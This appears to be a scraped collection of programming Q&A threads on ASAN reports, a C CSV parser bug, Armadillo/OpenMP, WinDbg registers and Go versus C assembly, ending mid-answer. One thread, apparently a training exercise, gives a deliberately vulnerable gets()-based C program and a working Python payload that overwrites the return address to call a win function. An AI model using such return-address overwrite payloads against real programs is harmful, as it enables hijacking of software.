Understanding ASAN summary - gcc

The example below is from an ASAN report caused by heap-use-after-free on address 0x6040000a06b0
How would I be able to tell that this was a heap use after free error solely from looking at this summary?
SUMMARY: AddressSanitizer: heap-use-after-free /build/gcc/src/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:826 in __interceptor_memcmp
Shadow bytes around the buggy address:
0x0c088000c080: fa fa fa fa fd fd fd fa fa fa fa fa fd fd fd fa
0x0c088000c090: fa fa fa fa fd fd fd fa fa fa fa fa fd fd fd fa
0x0c088000c0a0: fa fa fa fa fd fd fd fa fa fa fa fa fd fd fd fa
0x0c088000c0b0: fa fa fa fa fd fd fd fd fa fa fa fa 00 00 00 fa
0x0c088000c0c0: fa fa fa fa 00 00 00 fa fa fa fa fa 00 00 00 fa
=>0x0c088000c0d0: fa fa fa fa fd fd[fd]fa fa fa fa fa 00 00 00 fa
0x0c088000c0e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000c0f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000c100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000c110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000c120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
In greater scope, I am wondering what information I should be extracting and how do I interpret what the error is specifically from the above summary.
Would one be able to preemptively see additional ASAN errors if they happened to appear in this summary?

Each 8-byte chunk of user memory is mapped to single byte of Asan's shadow memory. If this 8-byte chunk contains valid data shadow byte will have 0, 1, ... or 7. Any other value tells Asan runtime that memory is invalid i.e. it was freed or stack frame was deallocated or something like that. In particular fd means that this address 0x6040000a06b0 points to freed heap buffer (same is true for preceeding 8 bytes btw - it's also marked with fd).
Details about particular values are explained at the end of error message:
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
To your other question, main error message is
SUMMARY: AddressSanitizer: heap-use-after-free /build/gcc/src/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:826 in __interceptor_memcmp
It tells you error type and it's location in code.
Normally it will also report full stacktrace for free() call and historical stacktrace for original malloc() call (I'm not sure why they are not includedin your message).

Related

Memory troubles in a DIY gcc csv reader

Writing some code to reformat some CSV data.
It's been a while since I was working in C and doing programming with memory management this raw, and I don't have a lot of experience with many of the tools for debugging memory allocation.
Diving right in I found some forum posts suggesting compiling like this to figure out where the segmentation fault was originating.
gcc -o CSVreader_v0.0-memcheck -static-libasan -O -g -fsanitize=address -fno-omit-frame-pointer -Wall -Wno-unused-result CSVreader.c
My only problem is I have no idea how to interpret the output can someone help walk me through this or point me to a guide on what all this means.
==9474==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000015 at pc 0x7f1a330533a6 bp 0x7ffedc0840d0 sp 0x7ffedc083878
WRITE of size 6 at 0x602000000015 thread T0
#0 0x7f1a330533a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
#1 0x55a46460155a in parseRow (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x155a)
#2 0x55a4646018e5 in parseCSV (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x18e5)
#3 0x55a464601c7b in main (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x1c7b)
#4 0x7f1a32e220b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#5 0x55a46460122d in _start (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x122d)
0x602000000015 is located 0 bytes to the right of 5-byte region [0x602000000010,0x602000000015)
allocated by thread T0 here:
#0 0x7f1a330cbb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
#1 0x55a4646014f1 in parseRow (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x14f1)
#2 0x55a4646018e5 in parseCSV (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x18e5)
#3 0x55a464601c7b in main (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x1c7b)
#4 0x7f1a32e220b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
Shadow bytes around the buggy address:
0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa fa[05]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==9474==ABORTING
I'd like to understand what all this means but equally if someone can point me to how I can get a more human readable output that would also be helpful, I tried valgrind, but I'm not sure I was using it correctly.
Right now my code is taking the first line of the csv file using
fscanf(fp, "%[^\n]\n", line_buffer);
with char* line_buffer and char** hStrings to store the column headers, I pass &linebuffer and &hStrings into the following function to parse the column headers in the 'line_buffer' string into 'hStrings' with the delimiting character being '|'.
/**
* Split str around the '|' character and store the data in dStr
**/
int parseRow(char** str, char*** dStr)
{
unsigned int columns = 0;
char* col;
printf("Splitting: %s\n", *str);
col = strsep(str, "|");
while(col != NULL && hasPrint(col, 0, strlen(col)))
{
printf("\n");
(*dStr)[columns] = malloc(strlen(col)*sizeof(char));
strcpy((*dStr)[columns], col);
columns++;
col = strsep(str, "|");
}
//printf("\n");
printf("counted: %d columns\n", columns);
return columns;
}
Before I was using `-fsanitize=address' the program would run this part correctly and a segmentation fault would occur later when I was parsing the rows of data, not the column headers. Now it generates the output I provided as it is working on the first row containing the headers. Not sure if that helps understand what's going on here.

Buffer overflow: overrwrite CH

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following:
xor ch, 0
...
cmp dword ptr [ebp+10h], 0F00DB4BE
Now, if I supply 2 different 4 byte argument, as part of my exploit, i.e. ABCDEFGH (assume ABCD is the first argument, EFGH the second), CH becomes G. So naturally I thought about crafting the following (assume ABCD is right):
ABCD\x00\x0d\x00\x00
What happens however, is that nullbutes seem to be ignored! Sending the above results in CH = 0 and CL = 0xd. This happens no matter where I put \x0d i.e.:
ABCD\x0d\x00\x00\x00
ABCD\x00\x0d\x00\x00
ABCD\x00\x00\x0d\x00
ABCD\x00\x00\x00\x0d
all yield that same behavior.
How can I proceed to only overwrite CH while leaving the rest of ECX as null?
EDIT: see my own answer below. The short version is that bash ignores null bytes and it explains, partially, why the exploit didn't work locally. The exact reason can be found here. Thanks to Michael Petch for pointing it out!
Source:
#include <stdio.h>
#include <stdlib.h>
void win(long long arg1, int arg2)
{
if (arg1 != 0x14B4DA55 || arg2 != 0xF00DB4BE)
{
puts("Close, but not quite.");
exit(1);
}
printf("You win!\n");
}
void vuln()
{
char buf[16];
printf("Type something>");
gets(buf);
printf("You typed %s!\n", buf);
}
int main()
{
/* Disable buffering on stdout */
setvbuf(stdout, NULL, _IONBF, 0);
vuln();
return 0;
}
The relevant part of objdump's disassembly of the executable is:
080491c2 <win>:
80491c2: 55 push %ebp
80491c3: 89 e5 mov %esp,%ebp
80491c5: 81 ec 28 01 00 00 sub $0x128,%esp
80491cb: 8b 4d 08 mov 0x8(%ebp),%ecx
80491ce: 89 8d e0 fe ff ff mov %ecx,-0x120(%ebp)
80491d4: 8b 4d 0c mov 0xc(%ebp),%ecx
80491d7: 89 8d e4 fe ff ff mov %ecx,-0x11c(%ebp)
80491dd: 8b 8d e0 fe ff ff mov -0x120(%ebp),%ecx
80491e3: 81 f1 55 da b4 14 xor $0x14b4da55,%ecx
80491e9: 89 c8 mov %ecx,%eax
80491eb: 8b 8d e4 fe ff ff mov -0x11c(%ebp),%ecx
80491f1: 80 f5 00 xor $0x0,%ch
80491f4: 89 ca mov %ecx,%edx
80491f6: 09 d0 or %edx,%eax
80491f8: 85 c0 test %eax,%eax
80491fa: 75 09 jne 8049205 <win+0x43>
80491fc: 81 7d 10 be b4 0d f0 cmpl $0xf00db4be,0x10(%ebp)
8049203: 74 1a je 804921f <win+0x5d>
8049205: 83 ec 0c sub $0xc,%esp
8049208: 68 08 a0 04 08 push $0x804a008
804920d: e8 4e fe ff ff call 8049060 <puts#plt>
8049212: 83 c4 10 add $0x10,%esp
8049215: 83 ec 0c sub $0xc,%esp
8049218: 6a 01 push $0x1
804921a: e8 51 fe ff ff call 8049070 <exit#plt>
804921f: 83 ec 0c sub $0xc,%esp
8049222: 68 1e a0 04 08 push $0x804a01e
8049227: e8 34 fe ff ff call 8049060 <puts#plt>
804922c: 83 c4 10 add $0x10,%esp
804922f: 83 ec 08 sub $0x8,%esp
8049232: 68 27 a0 04 08 push $0x804a027
8049237: 68 29 a0 04 08 push $0x804a029
804923c: e8 5f fe ff ff call 80490a0 <fopen#plt>
8049241: 83 c4 10 add $0x10,%esp
8049244: 89 45 f4 mov %eax,-0xc(%ebp)
8049247: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
804924b: 75 12 jne 804925f <win+0x9d>
804924d: 83 ec 0c sub $0xc,%esp
8049250: 68 34 a0 04 08 push $0x804a034
8049255: e8 06 fe ff ff call 8049060 <puts#plt>
804925a: 83 c4 10 add $0x10,%esp
804925d: eb 31 jmp 8049290 <win+0xce>
804925f: 83 ec 04 sub $0x4,%esp
8049262: ff 75 f4 pushl -0xc(%ebp)
8049265: 68 00 01 00 00 push $0x100
804926a: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049270: 50 push %eax
8049271: e8 da fd ff ff call 8049050 <fgets#plt>
8049276: 83 c4 10 add $0x10,%esp
8049279: 83 ec 08 sub $0x8,%esp
804927c: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049282: 50 push %eax
8049283: 68 86 a0 04 08 push $0x804a086
8049288: e8 a3 fd ff ff call 8049030 <printf#plt>
804928d: 83 c4 10 add $0x10,%esp
8049290: 90 nop
8049291: c9 leave
8049292: c3 ret
08049293 <vuln>:
8049293: 55 push %ebp
8049294: 89 e5 mov %esp,%ebp
8049296: 83 ec 18 sub $0x18,%esp
8049299: 83 ec 0c sub $0xc,%esp
804929c: 68 90 a0 04 08 push $0x804a090
80492a1: e8 8a fd ff ff call 8049030 <printf#plt>
80492a6: 83 c4 10 add $0x10,%esp
80492a9: 83 ec 0c sub $0xc,%esp
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets#plt>
80492b5: 83 c4 10 add $0x10,%esp
80492b8: 83 ec 08 sub $0x8,%esp
80492bb: 8d 45 e8 lea -0x18(%ebp),%eax
80492be: 50 push %eax
80492bf: 68 a0 a0 04 08 push $0x804a0a0
80492c4: e8 67 fd ff ff call 8049030 <printf#plt>
80492c9: 83 c4 10 add $0x10,%esp
80492cc: 90 nop
80492cd: c9 leave
80492ce: c3 ret
080492cf <main>:
80492cf: 8d 4c 24 04 lea 0x4(%esp),%ecx
80492d3: 83 e4 f0 and $0xfffffff0,%esp
80492d6: ff 71 fc pushl -0x4(%ecx)
80492d9: 55 push %ebp
80492da: 89 e5 mov %esp,%ebp
80492dc: 51 push %ecx
80492dd: 83 ec 04 sub $0x4,%esp
80492e0: a1 34 c0 04 08 mov 0x804c034,%eax
80492e5: 6a 00 push $0x0
80492e7: 6a 02 push $0x2
80492e9: 6a 00 push $0x0
80492eb: 50 push %eax
80492ec: e8 9f fd ff ff call 8049090 <setvbuf#plt>
80492f1: 83 c4 10 add $0x10,%esp
80492f4: e8 9a ff ff ff call 8049293 <vuln>
80492f9: b8 00 00 00 00 mov $0x0,%eax
80492fe: 8b 4d fc mov -0x4(%ebp),%ecx
8049301: c9 leave
8049302: 8d 61 fc lea -0x4(%ecx),%esp
8049305: c3 ret
It is unclear why you are hung up on the value in ECX or the xor ch, 0 instruction inside the win function. From the C code it is clear that the check for a win requires that the 64-bit (long long) arg1 to be 0x14B4DA55 and arg2 needs to be 0xF00DB4BE. When that condition is met it will print You win!
We need some kind of buffer exploit that has the capability to execute the win function and make it appear that it is being passed a first argument (64-bit long long) and a 32-bit int as a second parameter.
The most obvious way to pull this off is overrun buf in function vuln that strategically overwrites the return address and replaces it with the address of win. In the disassembled output win is at 0x080491c2. We will need to write 0x080491c2 followed by some dummy value for a return address, followed by the 64-bit value 0x14B4DA55 (same as 0x0000000014B4DA55 ) followed by the 32-bit value 0xF00DB4BE.
The dummy value for a return address is needed because we need to simulate a function call on the stack. We won't be issuing a call instruction so we have to make it appear as if one had been done. The goal is to print You win! whether the program crashes after that isn't relevant.
The return address (win), arg1, and arg2 will have to be stored as bytes in reverse order since the x86 processors are little endian.
The last big question is how many bytes do we have to feed to gets to overrun the buffer to reach the return address? You could use trial and error (bruteforce) to figure this out, but we can look at the disassembly of the call to gets:
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets#plt
LEA is being used to compute the address (Effective Address) of buf on the stack and passing that as the first argument to gets. 0x18 is 24 bytes (decimal). Although buf was defined to be 16 bytes in length the compiler also allocated additional space for alignment purposes. We have to add an additional 4 bytes to account for the fact that the function prologue pushed EBP on the stack. That is a total of 28 bytes (24+4) to reach the position of the return address on the stack.
Using PYTHON to generate the input sequence is common in many tutorials. Embedding NUL(\0) characters in a shell string directly may cause a shell program to prematurely terminate a string at the NUL byte (an issue that people have when using BASH). We can pipe the byte sequence to our program using something like:
python -c 'print "A"*28+"\xc2\x91\x04\x08" \
+"B"*4+"\x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0"' | ./progname
Where progname is the name of your executable. When run it should appear similar to:
Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBUڴ!
You win!
Segmentation fault
Note: the 4 characters making up the return address between the A's and B's are unprintable so they don't appear in the console output but they are still present as well as all the other unprintable characters.
As a limited answer to my own question, specifically regarding why null bytes are ignored:
It seems to be an issue with bash seemingly ignoring nullbytes
Many other of my peers faced the same problem when writing the exploit. It would work on the server but not locally when using gdb for example. Bash would simply disregard the nullbytes and thus \x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0 would be read in as \x55\xda\xb4\x14\xbe\xb4\x0d\xf0. The exact reason why it behaves that way still eludes me but it's a good thing to keep in mind!

Armadillo and OpenMP and stack-use-after-scope

I have an issue with a stack-use-after-scope with error with the C++ Armadillo library within an OpenMP blog in an R package and I cannot figure out what is wrong. The complete gcc log is here from the CRAN GCC ASAN check of the R-package. I have have kept the relevant part of the log below
==33791==ERROR: AddressSanitizer: stack-use-after-scope on address 0x7ffd03364940 at pc 0x7ff8127abc07 bp 0x7ffd03364680 sp 0x7ffd03364670
WRITE of size 4 at 0x7ffd03364940 thread T0
#0 0x7ff8127abc06 in arma::Mat<double>::Mat(double*, unsigned int, unsigned int, bool, bool) /data/gannet/ripley/R/test-3.5/RcppArmadillo/include/armadillo_bits/Mat_meat.hpp:1215
#1 0x7ff8129fb0c2 in GMA<logistic>::solve() [clone ._omp_fn.0] /data/gannet/ripley/R/test-3.5/RcppArmadillo/include/armadillo_bits/Col_meat.hpp:411
#2 0x7ff825ae2cde in GOMP_parallel (/lib64/libgomp.so.1+0xdcde)
#3 0x7ff812a0c9f8 in GMA<logistic>::solve() ddhazard/GMA_solver.cpp:83
#4 0x7ff81276421d in ddhazard_fit_cpp(...
Address 0x7ffd03364940 is located in stack of thread T0 at offset 416 in frame
#0 0x7ff8129fa82f in GMA<logistic>::solve() [clone ._omp_fn.0] ddhazard/GMA_solver.cpp:83
This frame has 5 object(s):
[32, 40) 'dest'
[96, 104) 'src'
[160, 176) 'ans'
[224, 384) 'my_X_cross'
[416, 576) '<unknown>' <== Memory access at offset 416 is inside this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-use-after-scope /data/gannet/ripley/R/test-3.5/RcppArmadillo/include/armadillo_bits/Mat_meat.hpp:1215 in arma::Mat<double>::Mat(double*, unsigned int, unsigned int, bool, bool)
Shadow bytes around the buggy address:
0x1000206648d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000206648e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000206648f0: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 f2 f2 f2 f2
0x100020664900: 00 f2 f2 f2 f2 f2 f2 f2 f8 f8 f2 f2 f2 f2 f2 f2
0x100020664910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100020664920: 00 00 00 00 f2 f2 f2 f2[f8]f8 f8 f8 f8 f8 f8 f8
0x100020664930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f3 f3 f3 f3
0x100020664940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100020664950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100020664960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100020664970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==33791==ABORTING
The WRITE that causes the error is in the dynamichazard/src/ddhazard/GMA_solver.cpp and particularly this OpenMP block
#ifdef _OPENMP
int n_threads = std::max(1, std::min(omp_get_max_threads(),
(int)r_set.n_elem / 1000 + 1));
#pragma omp parallel num_threads(n_threads) if(n_threads > 1)
{
#endif
arma::mat my_X_cross(q, q, arma::fill::zeros);
#ifdef _OPENMP
#pragma omp for schedule(static)
#endif
for(arma::uword i = 0; i < r_set.n_elem; i++){
auto trunc_eta = T::truncate_eta(
is_event[i], eta[i], exp(eta[i]), at_risk_length[i]);
h_1d[i] = w[i] * T::d_log_like(
is_event[i], trunc_eta, at_risk_length[i]);
double h_2d_neg = - w[i] * T::dd_log_like(
is_event[i], trunc_eta, at_risk_length[i]);
sym_mat_rank_one_update(h_2d_neg, X_t.unsafe_col(i), my_X_cross);
}
#ifdef _OPENMP
#pragma omp critical(gma_lock)
{
#endif
X_cross += my_X_cross;
#ifdef _OPENMP
}
}
#endif
As far as I can tell, the error is at the X_t.unsafe_col(i) call in the call to sym_mat_rank_one_update. The declaration of the function is
void sym_mat_rank_one_update(const double, const arma::vec&, arma::mat&);
It should trigger a call to the arma::col<double> constructor in line 411 of include/armadillo_bits/Col_meat.hpp which inherit the arma::mat<double> constructor in line 1215 of include/armadillo_bits/Mat_meat.hpp. I gather this is where the 4 bit write occurs with one of the unsigned int since the arma::mat<double> constructor is
template<typename eT>
inline
Mat<eT>::Mat(eT* aux_mem, const uword aux_n_rows, const uword aux_n_cols, const bool copy_aux_mem, const bool strict)
: n_rows ( aux_n_rows )
, n_cols ( aux_n_cols )
, n_elem ( aux_n_rows*aux_n_cols )
, vec_state( 0 )
, mem_state( copy_aux_mem ? 0 : ( strict ? 2 : 1 ) )
, mem ( copy_aux_mem ? 0 : aux_mem )
{
arma_extra_debug_sigprint_this(this);
if(copy_aux_mem == true)
{
init_cold();
arrayops::copy( memptr(), aux_mem, n_elem );
}
}
where
template<typename eT>
class Mat : public Base< eT, Mat<eT> >
{
public:
typedef eT elem_type; //!< the type of elements stored in the matrix
typedef typename get_pod_type<eT>::result pod_type; //!< if eT is std::complex<T>, pod_type is T; otherwise pod_type is eT
const uword n_rows; //!< number of rows (read-only)
const uword n_cols; //!< number of columns (read-only)
const uword n_elem; //!< number of elements (read-only)
const uhword vec_state; //!< 0: matrix layout; 1: column vector layout; 2: row vector layout
const uhword mem_state;
...
See include/armadillo_bits/Mat_bones.hpp and notice that arma::uword is unsigned int. However, I cannot figure out why this would cause a stack-use-after-scope.
A similar error is in the Morpho package. See the current CRAN log here and src/createL.cpp.
Setup
The above check is on CRAN. As far as I can tell, it is with gcc 7.2 on Fedora 26 with the following config.site used to build R
CXX="g++ -fsanitize=address,undefined,bounds-strict -fno-omit-frame-pointer"
CFLAGS="-g -O2 -Wall -pedantic -mtune=native -fsanitize=address"
FFLAGS="-g -O2 -mtune=native"
FCFLAGS="-g -O2 -mtune=native"
CXXFLAGS="-g -O2 -Wall -pedantic -mtune=native"
MAIN_LDFLAGS=-fsanitize=address,undefined
Further, the following ~/.R/Makevars is used
CC = gcc -std=gnu99 -fsanitize=address,undefined -fno-omit-frame-pointer
F77 = gfortran -fsanitize=address
FC = gfortran -fsanitize=address
FCFLAGS = -g -O2 -mtune=native -fbounds-check
FFLAGS = -g -O2 -mtune=native -fbounds-check
The error does not happen with clang 5.0.0 and valgrind on the same machine. Further, I cannot reproduce them on a local Ubuntu 17.04 with gcc version 6.3 and clang version 4.0.0.
Minimal, Complete, and Verifiable example
I will work on making one.

In WinDbg commands, how can I refer to a register with the same name as a global variable?

Suppose I want to debug this program using the WinDbg, cdb, or ntsd debuggers for Windows:
/* test.c */
#include <stdio.h>
int rip = 42;
int main(void)
{
puts("Hello world!");
return (0);
}
I compile the program for AMD64 and run it under WinDbg. I set a breakpoint at main(), and when the breakpoint hits, I want to inspect the value at the RIP register (program counter), and the memory around that value if the value is treated as a pointer.
I can see the value of the register directly with r rip, but when I try to look at the memory around that address, WinDbg shows me a different address! Having read the symbols in test.pdb, WinDbg sees that rip is a global variable declared in the C code and shows me the memory around &rip.
0:000> bu test!main
0:000> g
Breakpoint 0 hit
test!main:
00007ff6`de1868d0 4883ec28 sub rsp,28h
0:000> r rip
rip=00007ff6de1868d0
0:000> db rip
00007ff6`de1f2000 2a 00 00 00 ff ff ff ff-01 00 00 00 00 00 00 00 *...............
00007ff6`de1f2010 01 00 00 00 02 00 00 00-ff ff ff ff ff ff ff ff ................
00007ff6`de1f2020 00 00 00 00 00 00 00 00-43 46 92 e5 1b df 00 00 ........CF......
00007ff6`de1f2030 bc b9 6d 1a e4 20 ff ff-00 00 00 00 00 00 00 00 ..m.. ..........
00007ff6`de1f2040 00 01 00 00 00 00 00 00-ca b0 1e de f6 7f 00 00 ................
00007ff6`de1f2050 00 00 00 00 00 80 00 00-00 00 00 00 00 80 00 00 ................
00007ff6`de1f2060 d0 66 fc c2 f2 01 03 00-ab 90 ec 5e 22 c0 b2 44 .f.........^"..D
00007ff6`de1f2070 a5 dd fd 71 6a 22 2a 15-00 00 00 00 00 00 00 00 ...qj"*.........
0:000> ? rip
Evaluate expression: 140698265264128 = 00007ff6`de1f2000
0:000> ? dwo(rip)
Evaluate expression: 42 = 00000000`0000002a
This is really annoying, but as long as I'm aware of it, it isn't a problem when manually reading data like this. But if I want to use the register value, for example in scripting the debugger, then there is no easy workaround:
0:000> bu test!main ".if (dwo(rip) == 0n42) { .echo Whoops! I don't want to get here! }"
0:000> g
Whoops! I don't want to get here!
test!main:
00007ff6`de1868d0 4883ec28 sub rsp,28h
This problem, that symbols in the program hide register names, makes things really difficult for me. An actual scenario this broke:
I wanted to set a breakpoint on CreateFileW(), a very commonly called Windows API function.
Since I only cared about one particular file, I wanted to inspect the filename, which is passed in the RCX register, and continue past the breakpoint unless the filename matched the file I wanted.
But I couldn't write this condition, because another module in the program defined a symbol foobar!rcx, and any references to rcx I make in the command to execute on the breakpoint refer to that global variable!
So how do I tell WinDbg that yes, I really meant to read the register? And what if I want to write that register? There must be a simple thing I am missing here.
As noted in passing by another question, you can put an at sign (#) in front of a register name to force it to be interpreted as a register or pseudo-register, bypassing the attempt to parse it as a hexadecimal number or a symbol.
Registers and Pseudo-Registers in MASM Expressions
You can use registers and pseudo-registers within MASM expressions. You can add an at sign (#) before all registers and pseudo-registers. The at sign causes the debugger to access the value more quickly. This at sign is unnecessary for the most common x86-based registers. For other registers and pseudo-registers, we recommend that you add the at sign, but it is not actually required. If you omit the at sign for the less common registers, the debugger tries to parse the text as a hexadecimal number, then as a symbol, and finally as a register.

golang: index efficiency of array

It's a simple program.
test environment: debian 8, go 1.4.2
union.go:
package main
import "fmt"
type A struct {
t int32
u int64
}
func test() (total int64) {
a := [...]A{{1, 100}, {2, 3}}
for i := 0; i < 5000000000; i++ {
p := &a[i%2]
total += p.u
}
return
}
func main() {
total := test()
fmt.Println(total)
}
union.c:
#include <stdio.h>
struct A {
int t;
long u;
};
long test()
{
struct A a[2];
a[0].t = 1;
a[0].u = 100;
a[1].t = 2;
a[1].u = 3;
long total = 0;
long i;
for (i = 0; i < 5000000000; i++) {
struct A* p = &a[i % 2];
total += p->u;
}
return total;
}
int main()
{
long total = test();
printf("%ld\n", total);
}
result compare:
go:
257500000000
real 0m9.167s
user 0m9.196s
sys 0m0.012s
C:
257500000000
real 0m3.585s
user 0m3.560s
sys 0m0.008s
It seems that the go compiles lot of weird assembly codes (you could use objdump -D to check it).
For example, why movabs $0x12a05f200,%rbp appears twice?
400c60: 31 c0 xor %eax,%eax
400c62: 48 bd 00 f2 05 2a 01 movabs $0x12a05f200,%rbp
400c69: 00 00 00
400c6c: 48 39 e8 cmp %rbp,%rax
400c6f: 7d 46 jge 400cb7 <main.test+0xb7>
400c71: 48 89 c1 mov %rax,%rcx
400c74: 48 c1 f9 3f sar $0x3f,%rcx
400c78: 48 89 c3 mov %rax,%rbx
400c7b: 48 29 cb sub %rcx,%rbx
400c7e: 48 83 e3 01 and $0x1,%rbx
400c82: 48 01 cb add %rcx,%rbx
400c85: 48 8d 2c 24 lea (%rsp),%rbp
400c89: 48 83 fb 02 cmp $0x2,%rbx
400c8d: 73 2d jae 400cbc <main.test+0xbc>
400c8f: 48 6b db 10 imul $0x10,%rbx,%rbx
400c93: 48 01 dd add %rbx,%rbp
400c96: 48 8b 5d 08 mov 0x8(%rbp),%rbx
400c9a: 48 01 f3 add %rsi,%rbx
400c9d: 48 89 de mov %rbx,%rsi
400ca0: 48 89 5c 24 28 mov %rbx,0x28(%rsp)
400ca5: 48 ff c0 inc %rax
400ca8: 48 bd 00 f2 05 2a 01 movabs $0x12a05f200,%rbp
400caf: 00 00 00
400cb2: 48 39 e8 cmp %rbp,%rax
400cb5: 7c ba jl 400c71 <main.test+0x71>
400cb7: 48 83 c4 20 add $0x20,%rsp
400cbb: c3 retq
400cbc: e8 6f e0 00 00 callq 40ed30 <runtime.panicindex>
400cc1: 0f 0b ud2
...
while the C assembly is more clean:
0000000000400570 <test>:
400570: 48 c7 44 24 e0 64 00 movq $0x64,-0x20(%rsp)
400577: 00 00
400579: 48 c7 44 24 f0 03 00 movq $0x3,-0x10(%rsp)
400580: 00 00
400582: b9 64 00 00 00 mov $0x64,%ecx
400587: 31 d2 xor %edx,%edx
400589: 31 c0 xor %eax,%eax
40058b: 48 be 00 f2 05 2a 01 movabs $0x12a05f200,%rsi
400592: 00 00 00
400595: eb 18 jmp 4005af <test+0x3f>
400597: 66 0f 1f 84 00 00 00 nopw 0x0(%rax,%rax,1)
40059e: 00 00
4005a0: 48 89 d1 mov %rdx,%rcx
4005a3: 83 e1 01 and $0x1,%ecx
4005a6: 48 c1 e1 04 shl $0x4,%rcx
4005aa: 48 8b 4c 0c e0 mov -0x20(%rsp,%rcx,1),%rcx
4005af: 48 83 c2 01 add $0x1,%rdx
4005b3: 48 01 c8 add %rcx,%rax
4005b6: 48 39 f2 cmp %rsi,%rdx
4005b9: 75 e5 jne 4005a0 <test+0x30>
4005bb: f3 c3 repz retq
4005bd: 0f 1f 00 nopl (%rax)
Could somebody explain it? Thanks!
The main difference is the the array bounds checking. In the disassembly dump for the Go program, there is:
